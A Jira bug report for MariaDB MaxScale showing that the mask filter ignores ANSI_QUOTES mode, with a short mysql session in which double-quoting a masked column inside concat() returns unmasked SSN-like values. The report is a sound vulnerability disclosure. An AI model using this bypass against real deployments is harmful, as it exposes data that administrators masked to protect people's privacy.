Uploaded image for project: 'MariaDB MaxScale'
  1. MariaDB MaxScale
  2. MXS-2457

MaxScale Mask Filter incorrectly handles ANSI_QUOTES

    XMLWordPrintable

Details

    • MXS-SPRINT-81

    Description

      The query classifier does not take into account ANSI_QUOTES mode, allowing a malicious user to bypass firewall filter rules.

      mysql> select concat(ssn) from managers;
      		 
      ERROR 1141 (HY000): The function concat is used in conjunction with a field that should be masked for 'maxuser'@'::ffff:127.0.0.1', access is denied.
      		 
       
      		 
      mysql> set @@sql_mode = 'ANSI_QUOTES';
      		 
      Query OK, 0 rows affected (0.00 sec)
      		 
       
      		 
      mysql> select concat("ssn") from managers;
      		 
      +---------------+
      		 
      | concat("ssn") |
      		 
      +---------------+
      		 
      | 111-22-3333   |
      		 
      | 444-55-6666   |
      		 
      +---------------+
      		 
      2 rows in set (0.00 sec)

      Attachments

        Activity

          People

            johan.wikman Johan Wikman
            ctarquini Christopher Tarquini
            Votes:
            0 Vote for this issue
            Watchers:
            1 Start watching this issue

            Dates

              Created:
              Updated:
              Resolved:

              Git Integration

                Error rendering 'com.xiplink.jira.git.jira_git_plugin:git-issue-webpanel'. Please contact your Jira administrators.